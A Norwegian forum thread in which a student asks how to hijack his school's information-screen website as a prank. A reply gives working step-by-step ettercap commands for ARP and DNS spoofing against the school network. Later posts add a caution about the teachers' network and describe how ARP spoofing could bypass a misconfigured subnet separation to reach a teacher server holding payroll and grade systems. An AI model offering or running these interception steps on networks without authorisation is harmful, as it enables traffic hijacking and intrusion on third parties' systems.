Hei alle freaks!

Så hyggelig å koma tilbake til freakforum, mitt favorittforum frå da eg tok IKT på vgs.

Programmeringsferdigheitane mine er forsvunne litt i løpet av dei siste åra, då eg tok ei heilt anna utdanning i etterkant.

Men eg går no på ein skule, der me har ein storskjerm som visar informasjon og meldingar til alle elevar. Denne storskjermen visar kun ei nettside som dei oppdaterar kvar dag.

Eg har ein god tone med han som har it-ansvaret på skulen. Eg tenkte at det var på tide å gjera ein liten vennligsinna 'prank' mot han.

Idèen er å setja opp ein apache server på det samme nettverket som skulen og lage ei nettside som liknar på splash screen' som skulen brukar, hente informasjonen frå den originale sida, og tilføye eit par Chuck Norris-facts(elns).

Problemet er at eg ikkje hugsar om eg kan hijacke ei adresse ved å berre setje opp ein apache-server og påstå at adressa mi er den samme som blir brukt på skulen eller om eg må inn i routeren for å forandre kvar maskinane søkjer fram domena sine.(det sistnemnte er ikkje ein moglegheit)

Eg ser no at spørsmålet er litt merkelig formulert, men eg håpar at nokon forstod spørsmålet mitt og kan gi eit lite svar :-)

Så det holder med andre ord ikkje å kun setje opp ein apache server med namn/adresse "nrk.no" for å stjele all trafikk, altså?

/noob out

1. Last ned og installer ettercap
2. Finn etter.dns filen og legg til: "* A [IP_TIL_APACHE SERVER]", f.eks: "* A 192.168.0.1"
3. Start opp apache serveren.
4. Start opp ettercap med kommandoen: ettercap -T -M arp -P dns_spoof /[IP_TIL_SKJERMEN]/ /[IP_TIL_GATEWAY]/
5. Vent til siden refreshes.

Profit!

EDIT:
Nei!

Husk på den gyldne regelen når du kødder med nettverk på skolen:
VÆR JÆVLI SIKKER PÅ AT DU IKKE FUCKER MED LÆRERNETTVERKET!

Blir du tatt i ha vært inne på lærernettverket kommer du til å havne i heavy trøbbel. Ikke fordi du nødvendigvis har gjort noe, men fordi det er jævli vanskelig å vite hva du kan ha gjort, og lønnsystemer/karaktersystemer er tilgjengelig igjennom lærernettverket.

Utrolig at folk klarer å komme med en moralpreik på selv slike tråder.

Det er krav om at Administrasjonsnettet (lærernettet) og Brukernettet (Elevnettet) skilles fysisk, MEN VLAN er vist godkjent til skilling (hvis jeg har forstått det riktig).

Uansett, jeg tviler på at du klarer å komme deg fra brukernettet til administrasjonnettet uansett om dem bruker VLAN.

EDIT: Og det verste er at det er en moralpreik får ARP spoofing (som retter seg selv opp, hvis du glemmer å re-ARP'e nettverket).

Pft, jeg driter da langt fanden i moralen.

Poenget er at noe som helst kødd med lærerdelen av nettverket kommer etter all sannsynlighet til å bli straffa hardt.

Når jeg tok over nettverket på skolen jeg jobba var det satt opp elev/lærer delt opp i to subnett som ikke kunne kommunisere.. utenom at de hadde lagt til unntak i rutingtabellen som gjorde at de to serverene på hver sin side kunne kommunisere. ARP-spoofing av serveren kunne dermed gjøre at du fikk lov til å kommunisere med lærerserveren. Jeg fjerna jo selvfølgelig dette unntaket så fort jeg så det, men dette betyr også at hadde jeg tatt en elev i ARP-spoofing av elevserveren før jeg fjerna det, så hadde jeg blitt jævli mistenksom. Det som gjorde problemet enda verre var at lærerserveren kjørte en hel haug sær programvare, gammel windows versjon og jeg tørte knapt å røre den (hadde ikke spesielt*mye tid tilgjengelig, så haddde kun fokus på å holde ting gående).

Poenget er at IT-ansvarlige på skoler ikke er godt betalt, og det er en generelt kjip jobb. Du kan dermed anta at nettverket ikke er satt opp bra, og at menneskene som skal bedømme hva som har skjedd etterpå etter all sannsynlighet ikke er kompetente.

Da bør man være forsiktig.
Ja.